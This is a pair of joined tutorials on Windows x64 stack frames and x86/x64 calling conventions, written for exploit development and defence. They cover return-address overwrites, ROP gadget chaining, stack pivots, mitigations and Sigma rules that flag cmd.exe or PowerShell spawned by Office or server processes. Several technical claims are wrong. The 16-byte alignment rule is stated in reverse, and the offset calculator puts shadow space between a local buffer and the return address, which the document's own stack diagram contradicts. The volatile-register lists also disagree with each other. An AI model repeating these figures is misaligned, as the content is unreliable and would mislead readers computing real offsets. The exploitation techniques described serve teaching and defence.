The Windows x64 ABI consolidates every x86 convention into a single calling convention. The first four integer or pointer parameters pass in RCX, RDX, R8, R9; the first four floating-point parameters in XMM0XMM3. Additional arguments spill onto the stack.

Two rules dominate the x64 layout:

  • Shadow space (home space): The caller allocates 32 bytes immediately above the return address, regardless of how many parameters are actually used. The callee may dump RCX/RDX/R8/R9 into this home space if it needs to spill them.
  • 16-byte alignment: RSP must be 16-byte aligned at a CALL. Because CALL pushes an 8-byte return address, RSP is 16n+8 before the call and 16n-aligned on entry to the callee.

Critically, x64 functions typically address locals and arguments RSP-relative, leaving RSP constant for the body of the function. RBP is freed for general use unless alloca() is present.

[High address — caller's frame]
  Stack arg 5+      ← [RSP + 0x28+]
  Shadow [R9]       ← [RSP + 0x20]
  Shadow [R8]       ← [RSP + 0x18]
  Shadow [RDX]      ← [RSP + 0x10]
  Shadow [RCX]      ← [RSP + 0x08]   (relative to callee entry)
  Return Address    ← [RSP + 0x00]   ← ret-overwrite target
  Local variables   ← [RSP - N]
[Low address — grows downward]

Diagram of the x64 Windows ABI stack layout showing extra arguments, 32-byte shadow space, return address, saved non-volatile registers, and local variables down to RSP
The x64 Windows ABI reserves 32 bytes of shadow space above the return address; RSP remains constant through the function body for RSP-relative addressing.

5. Volatile vs. Non-Volatile Registers and Leaf Functions

The x64 convention splits the register file into volatile (caller-saved) and non-volatile (callee-saved). A function that clobbers a non-volatile register must save and restore it in its prologue/epilogue.

ClassRegisters
Volatile (caller-saved)RAX, RCX, RDX, R8R11, XMM0XMM5
Non-volatile (callee-saved)RBX, RBP, RDI, RSI, R12R15, XMM6XMM15

A leaf function changes no non-volatile register (including not altering RSP by calling out). A non-leaf function calls another function — which adjusts RSP — and therefore must establish a frame and register unwind data. This distinction drives whether the compiler emits a prologue and .pdata entry at all.


6. Prologue and Epilogue Deep Dive

The prologue establishes the frame: save callee-saved registers and reserve local space. The epilogue reverses it and returns.

; x86 epilogue
mov  esp, ebp      ; free locals
pop  ebp           ; restore caller's EBP
ret                ; pop return address → EIP

LEAVE is a single instruction equivalent to mov esp, ebp + pop ebp, available on both x86 and x64.

; x64 MASM (ml64) non-leaf frame
sub  rsp, 0x28     ; 0x20 shadow + 8 align pad
; ... body uses [rsp+0x..] for locals/spills ...
add  rsp, 0x28     ; deallocate
ret                ; pop return address → RIP

Many optimized x64 functions omit push rbp entirely and address everything from RSP. Frame Pointer Omission (FPO) saves two instructions and frees RBP as a general register; GCC/Clang do this by default at -O2, and MSVC does similarly with /O2. For exploitation this matters: without a frame pointer there is no [EBP+4] anchor for the return address — offsets must be computed from RSP at a known instruction.

__declspec(noinline) int callee(int a, int b, int c, int d) {
    int local = a + b + c + d;   // forces a real frame + homing
    return local;
}
int caller(void) { return callee(1, 2, 3, 4); }

Compile this on Godbolt or step it in WinDbg to watch RCX/RDX/R8/R9 home into shadow space.


7. Unwind Data and Structured Exception Handling

x64 Windows requires every non-leaf function to register unwind data in the PE .pdata and .xdata sections so the OS can walk frames during structured exception handling. Each function publishes a RUNTIME_FUNCTION and an associated UNWIND_INFO that describes the prologue.

typedef struct _RUNTIME_FUNCTION {
    ULONG BeginAddress;
    ULONG EndAddress;
    ULONG UnwindData;   // RVA to UNWIND_INFO
} RUNTIME_FUNCTION, *PRUNTIME_FUNCTION;

RtlVirtualUnwind() consumes this data to reconstruct caller frames without a frame pointer. For defenders, intact, parseable unwind data is what lets EDR and crash tooling produce a reliable call stack; ROP chains and stack pivots frequently produce stacks that fail to unwind cleanly — itself a detectable anomaly.


8. Reading Stack Frames in a Debugger

In WinDbg or x64dbg you read the live frame directly off RSP.

bp mymodule!vuln        ; break at the function
g                       ; run to it
dps rsp L10             ; dump 16 pointer-sized stack slots
r rsp, rbp, rip         ; show live pointers
k                       ; walk the call stack (uses unwind data)

dps rsp L10 prints the raw stack; the slot at [RSP+0x08] after entry (or the top after the prologue) holds the saved return address, which k resolves to module!function+offset. A return address that resolves to no module — or to the stack itself — is the first sign of a hijacked frame.


9. How Stack Overflows Corrupt Frame Integrity

Overflowing a fixed local buffer writes past its bounds toward higher addresses, in the direction of the saved frame pointer and the return address.

# Conceptual layout arithmetic — NOT a payload.
# 64-byte buffer sitting below the saved return address.
import struct

buf_size      = 64
saved_rbp     = 8          # x86: 4
ret_addr_slot = 8          # x86: 4
offset_to_ret = buf_size + saved_rbp   # bytes before reaching the return slot

print(f"bytes before saved frame ptr: {buf_size}")
print(f"bytes before return address : {offset_to_ret}")

When execution reaches RET, the CPU pops whatever now sits in the return slot into RIP/EIP and jumps there. A controlled overwrite places a valid, attacker-chosen address (a gadget or function); an uncontrolled overwrite leaves garbage, producing an immediate access violation. The distinction matters operationally: uncontrolled corruption crashes loudly (WER dump), while a precise overwrite can transfer control silently — which is exactly why the compiler inserts a guard between the buffer and the return address.


Flow diagram showing how an oversized buffer write sequentially corrupts the GS cookie, saved frame pointer, and return address before RET transfers control to an attacker-chosen address
A stack overflow progresses deterministically from the buffer edge through the GS cookie and saved frame pointer to the return address, hijacking control at the next RET.

10. Modern Mitigations and What They Change About the Layout

Mitigations alter the frame layout or the trust placed in it; none remove the need to understand the stack.

// /GS inserts a cookie between locals and the saved frame data.
void vuln(char *src) {
    char buf[64];
    // prologue: mov rax, __security_cookie; xor rax, rsp; mov [rsp+0x..], rax
    strcpy(buf, src);
    // epilogue: mov rcx, [rsp+0x..]; xor rcx, rsp; call __security_check_cookie
}
MitigationStructural Effect
/GS stack cookie__security_cookie placed between locals and saved return address; mismatch → __report_gsfailure
DEP / NXIMAGE_DLLCHARACTERISTICS_NX_COMPAT; stack pages non-executable, blocking on-stack shellcode
ASLRIMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE; randomizes stack/image base, breaking hardcoded addresses
Control Flow GuardIMAGE_GUARD_CF_INSTRUMENTED; validates indirect call targets
Intel CET Shadow StackCETCOMPAT mitigation; read-only shadow copy of return addresses defeats classic ret-overwrites

11. Common Attacker Techniques

TechniqueDescription
Saved return-address overwriteOverflow a local buffer to replace [RSP+0x08]/[EBP+4] and redirect RET
Saved frame pointer overwriteCorrupt saved RBP/EBP to desynchronize the frame chain or pivot
Stack pivotUse a gadget (xchg rsp, rax; leave; ret) to point RSP at attacker data
ROP chainingDefeat DEP by chaining ret-terminated gadgets via the corrupted stack
SEH overwrite (x86)Corrupt the exception handler chain on the stack to gain control on fault
Off-by-one / frame-pointer overwriteSingle-byte overflow to truncate or shift EBP, shifting subsequent frame math

These primitives all depend on knowing the exact offset from a controllable buffer to the saved control-flow data — which is precisely the layout this tutorial defines.


12. Defensive Strategies & Detection

Detection focuses on the crash artifacts and post-exploitation behavior that stack corruption produces, since the corruption itself is often only visible at the moment of RET.

SignalDetail
Windows Error ReportingAccess violation at abnormal RIP; dumps under %LOCALAPPDATA%\Microsoft\Windows\WER\ReportQueue; Application Event 1000/1001
Sysmon Event ID 1Unusual child process from document/browser renderers (T1203 follow-on)
Sysmon Event ID 10Cross-process stack reads via ReadProcessMemory
Security Event 4672Special privileges to an unexpected logon (T1068 follow-on)
ETW Microsoft-Windows-Kernel-ProcessAnomalous RIP/RSP deltas via call-stack sampling (stack pivot)
ETW Microsoft-Windows-Security-MitigationsEmits events when CFG, DEP, or Shadow Stack violations are blocked

A practical first-line Sigma sketch catches the most common post-exploitation chain — a renderer spawning a shell:

title: Suspicious Child Process From Document Renderer
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\WINWORD.EXE'
      - '\EXCEL.EXE'
      - '\AcroRd32.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\wscript.exe'
  condition: selection
level: high

Hardening checklist: compile with /GS (verify no /GS-), link /NXCOMPAT and /DYNAMICBASE, enable CFG with /guard:cf, turn on CET via SetProcessMitigationPolicy(ProcessUserShadowStackPolicy, ...), enforce /SAFESEH on x86, and configure Windows Defender Exploit Guard for legacy binaries. MITRE mitigation M1050 (Exploit Protection) bundles these OS controls.


13. MITRE ATT&CK Mapping

Stack layout knowledge is foundational rather than a single technique; the mapping below frames it in the defensive direction — recognizing the artifacts each technique produces.

TechniqueMITRE IDDetection
Exploitation for Client ExecutionT1203Sysmon EventID 1 renderer child chains; WER crash dumps
Exploitation for Privilege EscalationT1068Security EventID 4672 unexpected source process
Exploit Public-Facing ApplicationT1190Service crash loops + WER on network-facing daemons
Reflective Code LoadingT1620ETW call-stack anomalies; non-image-backed RIP
Process InjectionT1055Sysmon EventID 8/10; abnormal cross-process access

14. Tools for Stack Analysis

ToolDescriptionLink
WinDbgKernel/user debugging, k, dps, unwind walkingmicrosoft.com
x64dbgLive user-mode stack inspection on x64/x86x64dbg.com
Godbolt Compiler ExplorerView prologue/epilogue and FPO across compilersgodbolt.org
GhidraStatic reconstruction of frames and calling conventionsghidra-sre.org
Process HackerLive thread stacks and call-stack walkingprocesshacker.sourceforge.io
NASMAssemble illustrative prologue/epilogue snippetsnasm.us
GDB + pwndbgCross-platform frame and offset analysisgdb.gnu.org

Summary

  • The stack is a downward-growing region where buffers sit beside the very return address the CPU trusts at RET — which is why it is the primary target of memory-safety exploits.
  • x86 frames anchor on EBP with multiple calling conventions; x64 uses one convention, RCX/RDX/R8/R9 parameters, 32-byte shadow space, 16-byte alignment, and RSP-relative addressing.
  • The prologue saves non-volatile registers and reserves locals; the epilogue (LEAVE/RET) reverses it; frame-pointer omission removes the [EBP+4] anchor and forces RSP-relative offset math.
  • Overflows corrupt saved RBP/EBP and the return address; /GS, DEP, ASLR, CFG, and CET Shadow Stack change the layout’s trust model but not the need to understand it.
  • Detect follow-on activity via WER dumps, Sysmon EventID 1/10, Security 4672, and ETW mitigation/call-stack events, mapped to T1203 and T1068.

Related Tutorials

References

x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V

Objective: Understand how the five major calling conventions — cdecl, stdcall, fastcall, the Microsoft x64 ABI, and the System V AMD64 ABI — dictate argument passing, register ownership, stack cleanup, and alignment, and exactly why those rules determine where return addresses and arguments sit in memory when a vulnerability is triggered.


1. Why Calling Conventions Matter for Exploit Development

A calling convention is the contract between a caller and a callee. It specifies how arguments are passed (stack or registers), where the return value lands, which registers the callee must preserve, and who cleans up the stack. None of this is arbitrary — it is fixed by the ABI for a given platform and compiler.

For a defender or authorized red-teamer, this matters because stack layout is deterministic. When a local buffer overflows, the bytes that land on the saved return address are determined entirely by the convention in force. Reliable overflow payloads, return-to-libc chains, and ROP gadgets all depend on knowing precisely where the return address, arguments, and saved registers sit. Get the convention wrong and your offset math is wrong.


2. Stack Mechanics Refresher: PUSH, POP, CALL, RET

The stack grows downward (toward lower addresses). PUSH decrements the stack pointer (ESP/RSP) and writes; POP reads and increments it.

  • CALL target pushes the return address (the next instruction’s EIP/RIP) onto the stack, then jumps.
  • RET pops that saved address back into the instruction pointer.
  • RET N pops the address and adds N to ESP — this is how a callee cleans caller-pushed arguments.
push arg1          ; arg on stack
call foo           ; pushes return address, jumps to foo
add  esp, 4        ; caller cleans 1 dword arg (cdecl)

Because CALL writes the return address to a predictable slot, any write primitive that reaches that slot redirects control flow. Every convention below differs only in how the arguments around that slot are arranged.


3. x86 cdecl: The C Standard

__cdecl is the default for C functions on 32-bit x86 (MSVC flag /Gd). Arguments are pushed right to left, and the caller cleans the stack. The return value comes back in EAX. C names are decorated with a single leading underscore (_foo), no case translation.

Because the caller cleans up, cdecl is the only x86 convention that supports variadic functions (printf-style va_list) — the callee never needs to know the argument count.

; foo(1, 2, 3);  -- cdecl
push 3             ; rightmost first
push 2
push 1             ; leftmost last
call _foo
add  esp, 12       ; CALLER cleans 3 dwords

Canonical x86 stack frame at function entry (high → low address):

[arg N]          ← pushed last (rightmost)
[arg 2]
[arg 1]          ← pushed first
[return address] ← pushed by CALL
[saved EBP]      ← pushed by prologue (PUSH EBP)
[local vars]     ← ESP after SUB ESP, N

The saved EBP and return address are the primary targets of a stack-based overflow. Overflow a local buffer and you overwrite them in that exact order.


Diagram showing x86 cdecl stack frame from high to low address: last argument, first argument, saved return address, saved EBP, then local buffer where overflow begins
In cdecl, overflowing a local buffer overwrites saved EBP and then the return address in exactly this order — making the offset deterministic.

4. x86 stdcall: The Windows API Convention

__stdcall is the convention for the Win32 API. Arguments still push right to left, but the callee cleans the stack using RET N. This is efficient for fixed-argument functions, but it forbids variadics.

Name decoration encodes the byte count of stack arguments: a leading underscore, an @, then the size in bytes (always a multiple of 4). MessageBoxA with four pointer/int args becomes _MessageBoxA@16.

; foo(1, 2);  -- stdcall, two dword args
push 2
push 1
call _foo@8
; NO add esp here — callee handled it
foo:
    ; ... body ...
    ret 8          ; CALLEE pops 8 bytes of args

For shellcode and custom loaders, the @N suffix matters when resolving and patching the Import Address Table — the decorated name must match the export.


5. x86 fastcall: Register-Based Argument Passing

__fastcall (MSVC flag /Gr) passes the first two integer arguments in ECX and EDX; remaining arguments push right to left, and the callee cleans them. Decoration uses a leading @ (e.g. @foo@8). All __fastcall functions must have prototypes.

; foo(1, 2, 3);  -- MSVC fastcall
mov  ecx, 1        ; arg1 in ECX
mov  edx, 2        ; arg2 in EDX
push 3             ; arg3 on stack
call @foo@12

⚠️ Compiler variance: __fastcall is not standardized across compilers. MSVC uses ECX/EDX. Borland passes the first three arguments in EAX, EDX, ECX. When reversing a non-MSVC binary, verify register usage before trusting any decompiler’s __fastcall label.


6. Microsoft x64 ABI: The Modern Windows Convention

On Windows x64 there is effectively one ABI; the /Gd, /Gr, /Gz flags only exist for x86 targets. The convention is a four-register fastcall:

Argument slotInteger registerFloat register
1RCXXMM0
2RDXXMM1
3R8XMM2
4R9XMM3

Key rules:

  • One-to-one correspondence: each argument maps to exactly one register/slot; a single argument is never split across registers.
  • Any argument larger than 8 bytes, or not sized 1/2/4/8 bytes, is passed by reference.
  • Arguments beyond the first four go on the stack after the shadow space.
  • The stack must be 16-byte aligned before CALL.
  • The x87 stack is unused; all floating-point work uses the 16 XMM registers and is volatile across calls.

Shadow space (home space): the caller must allocate 32 bytes on the stack before the CALL, even if the callee takes fewer than four arguments, and reclaim it afterward. The callee may spill RCX/RDX/R8/R9 into this region.

; foo(a, b, c, d) -- Microsoft x64
mov  rcx, a
mov  rdx, b
mov  r8,  c
mov  r9,  d
sub  rsp, 20h      ; 32 bytes shadow space (caller's job)
call foo
add  rsp, 20h      ; reclaim shadow space

Volatile (caller-saved): RAX, RCX, RDX, R8, R9, R10, R11, XMM4, XMM5.
Non-volatile (callee-saved): RBX, RBP, RDI, RSI, R12R15, XMM6XMM15.


Diagram of Microsoft x64 ABI stack layout showing stack arguments above the mandatory 32-byte shadow space, the saved return address written by CALL, and the callee local frame below, with registers RCX RDX R8 R9 carrying the first four arguments
The mandatory 32-byte shadow space sits between caller stack arguments and the saved return address, shifting buffer-to-RIP offsets by 32 bytes versus an equivalent System V frame.

7. System V AMD64 ABI: The Linux and macOS Convention

System V AMD64 is followed on Linux, macOS, FreeBSD, Solaris, and other POSIX systems. It uses six integer argument registers:

Argument slotInteger registerFloat register
1RDIXMM0
2RSIXMM1
3RDXXMM2
4RCXXMM3
5R8XMM4XMM7 (5–8)
6R9

Additional arguments push onto the stack in reverse order. The return value is in RAX; for 128-bit returns the high 64 bits go in RDX. The stack is 16-byte aligned just before CALL.

  • Callee-saved: RBX, RBP, R12R15. All others are caller-saved.
  • Red zone: the 128 bytes below RSP are reserved and untouched by signal/interrupt handlers. Leaf functions may use this area as their entire frame without adjusting RSP.
  • Syscall variant: kernel entry uses the same registers except R10 replaces RCX (because the syscall instruction clobbers RCX).
  • Varargs: for variadic functions, RAX must hold the number of vector (XMM) registers used, 0–8.
; write(1, buf, len) via syscall -- System V
mov  rax, 1         ; sys_write
mov  rdi, 1         ; fd (arg1)
mov  rsi, buf       ; buffer (arg2)
mov  rdx, len       ; count (arg3)
; NOTE: a syscall uses R10 in place of RCX for arg4
syscall
; leaf function may freely use [rsp-128 .. rsp] (red zone)

⚠️ Shadow space vs. red zone are mutually exclusive and commonly confused. Shadow space (32 bytes above the call) exists only on Windows x64. The red zone (128 bytes below RSP) exists only on System V. Never assume both.


Graph comparing System V AMD64 ABI and Microsoft x64 ABI side by side, highlighting differing argument registers, the System V red zone versus the Microsoft shadow space, and their shared 16-byte alignment requirement
Red zone and shadow space are mutually exclusive per-platform features — conflating them is a classic source of cross-platform shellcode crashes.

8. Side-by-Side Comparison and ABI Detection in Disassembly

PropertyMicrosoft x64System V AMD64
Integer arg registersRCX, RDX, R8, R9RDI, RSI, RDX, RCX, R8, R9
FP arg registersXMM0XMM3XMM0XMM7
Shadow space32 bytes (mandatory)None
Red zoneNone128 bytes below RSP
Callee-savedRBX, RBP, RDI, RSI, R12R15, XMM615RBX, RBP, R12R15

Recognition heuristics in IDA/Ghidra:

  • A sub rsp, 0x20 immediately before CALL and arguments loaded into RCX/RDX/R8/R9Microsoft x64.
  • Arguments loaded into RDI/RSI/RDX and writes into [rsp-8] without a prior sub rspSystem V (red zone).
  • A ret N (non-zero immediate) on 32-bit code ⇒ stdcall or fastcall; arguments in ECX/EDX distinguish fastcall.
  • A bare ret with caller-side add esp, Ncdecl.

Automated ABI detection can misfire on hand-written assembly, non-MSVC fastcall, or -fomit-frame-pointer builds — always confirm against the actual prologue.


9. Calling Conventions as an Attack Surface

Each convention places the return address at a known offset from a local buffer. That offset is the difference between a working and a failing overflow.

In 64-bit binaries, overflowing a buffer controls stack contents, not registers directly — which is exactly why return-oriented programming is needed. To call a libc function on x64 Linux, you must first load the argument register: a pop rdi ; ret gadget sets arg 1 before the call. This is a direct consequence of the System V ABI placing arg 1 in RDI.

On Windows x64, the mandatory 32-byte shadow space shifts the offset from a local buffer to the saved return address by 32 bytes versus an equivalent Linux frame — a classic source of off-by-32 errors in cross-platform shellcode.

A conceptual offset calculator makes the dependency explicit:

def return_addr_offset(buf_size, conv):
    # bytes from start of local buffer to the saved return address
    if conv == "x86_cdecl" or conv == "x86_stdcall":
        return buf_size + 4            # + saved EBP (4 bytes)
    if conv == "sysv_amd64":
        return buf_size + 8            # + saved RBP (8 bytes)
    if conv == "ms_x64":
        return buf_size + 8 + 0x20     # saved RBP + 32B shadow space
    raise ValueError("unknown convention")

Frame-pointer presence (-fomit-frame-pointer removes saved RBP) and shadow space both change the answer — which is why convention awareness precedes any reliable payload.


Flow diagram of a ROP chain on System V AMD64 showing overflow redirecting to a pop-rdi-ret gadget loading arg1 into RDI, then a pop-rsi-ret gadget loading arg2 into RSI, before jumping to a libc function
Every ROP gadget that loads a register is a direct consequence of the ABI — on System V you need pop rdi; ret for arg 1 because the convention mandates RDI, not the stack.

10. Common Attacker Techniques

TechniqueDescription
Saved return-address overwriteOverflow a local buffer to clobber the convention-determined return slot
Return-to-libc (x86)Stack-arranged args (cdecl) let an attacker call system() without shellcode
ROP register loading (x64)Use pop rdi ; ret / pop rcx ; ret gadgets to satisfy the ABI before a call
Shadow-space-aware stack pivotAccount for the 32-byte home space when chaining Windows x64 gadgets
IAT patching via decorationResolve _func@N decorated stdcall imports for shellcode loaders
Reflective API callsManually set up RCX/RDX/R8/R9 + shadow space before invoking LoadLibraryA

Reflective loaders and injected shellcode must respect the target ABI exactly — wrong argument registers or a missing shadow allocation crashes the call.


11. Defensive Strategies & Detection

Note: A calling convention is a compile-time/binary property — no Sysmon Event ID fires because a convention is used. Detection is indirect: it triggers on the runtime artifacts of a convention-aware exploit.

Compile-time mitigations motivated directly by convention layout:

  • Stack canaries/GS (MSVC), -fstack-protector-strong (GCC/Clang) detect return-address overwrite before RET.
  • Control Flow Guard/guard:cf validates indirect CALL targets.
  • Intel CET / Shadow Stack — hardware enforces that RET pops the address CALL pushed, directly countering return-address overwrites. Mark binaries with IMAGE_DLLCHARACTERISTICS_GUARD_CET_COMPAT (0x4000).
  • ASLR + PIE — randomizes addresses so known layout still yields unknown absolute targets.
  • -mno-red-zone — hardens Linux kernel modules against red-zone clobbering.

Runtime telemetry for the exploitation aftermath:

  • Sysmon Event ID 1 (Process Create) — anomalous children of network-facing services after a successful ROP/return-to-libc chain.
  • Sysmon Event ID 10 (Process Access) — VirtualAllocEx/WriteProcessMemory from convention-correct injected shellcode.
  • Sysmon Event ID 7 (Image Load) — unexpected DLL loads from a corrupted return address redirecting into LoadLibrary.
  • Microsoft-Windows-Threat-Intelligence ETW — kernel telemetry on NtAllocateVirtualMemory / NtWriteVirtualMemory.
  • Audit Process Creation (Event 4688) with command-line logging.
title: Suspicious Child Process from Network-Facing Service After Exploitation
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\w3wp.exe'
      - '\sqlservr.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
  condition: selection
level: high

12. Tools for Calling-Convention Analysis

ToolDescriptionLink
IDA Pro / GhidraDecompiler ABI inference and stack-frame reconstructionghidra-sre.org
x64dbgLive register/stack inspection on Windowsx64dbg.com
GDB + pwndbgStack and register view on Linux (x/16gx $rsp)gnu.org
WinDbgInspect shadow space and frame layout (dd rsp)microsoft.com
Godbolt Compiler ExplorerCompare emitted asm across conventions/compilersgodbolt.org
ROPgadget / RopperEnumerate pop rdi ; ret-style register-loading gadgetsgithub.com
NASMHand-assemble convention test casesnasm.us
Radare2Cross-platform disassembly and ABI heuristicsrada.re

13. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Exploitation for Client ExecutionT1203Crash telemetry, Event 4688 child-process anomalies
Exploit Public-Facing ApplicationT1190WAF/IDS, anomalous service children (Event ID 1)
Process InjectionT1055Sysmon Event ID 10 (VirtualAllocEx/WriteProcessMemory)
Process Injection: DLL InjectionT1055.001Event ID 7 unexpected LoadLibraryA loads
Command and Scripting InterpreterT1059Event ID 1 cmd.exe/powershell.exe spawns
Reflective Code LoadingT1620ETW Threat-Intelligence memory-write telemetry

ATT&CK has no technique ID for “calling-convention abuse” — convention knowledge is prerequisite craft underlying these exploitation and injection techniques.


Summary

  • Calling conventions are the binary-level contract that makes stack layout deterministic — and therefore exploitable.
  • x86 splits into cdecl (caller cleanup, variadics, _foo), stdcall (callee RET N, _foo@N), and fastcall (ECX/EDX, MSVC-specific vs. Borland’s EAX/EDX/ECX).
  • The two 64-bit ABIs differ in argument registers (RCX,RDX,R8,R9 vs. RDI,RSI,RDX,RCX,R8,R9), shadow space (Windows only) vs. red zone (System V only), and callee-saved sets.
  • Convention dictates the buffer-to-return-address offset and the ROP register-loading gadgets required — pop rdi ; ret on Linux, shadow-space accounting on Windows.
  • Detect the exploitation artifacts, not the convention: Sysmon Event IDs 1/7/10, ETW Threat-Intelligence telemetry, and Event 4688, hardened with canaries, CFG, and CET shadow stacks.

Related Tutorials

References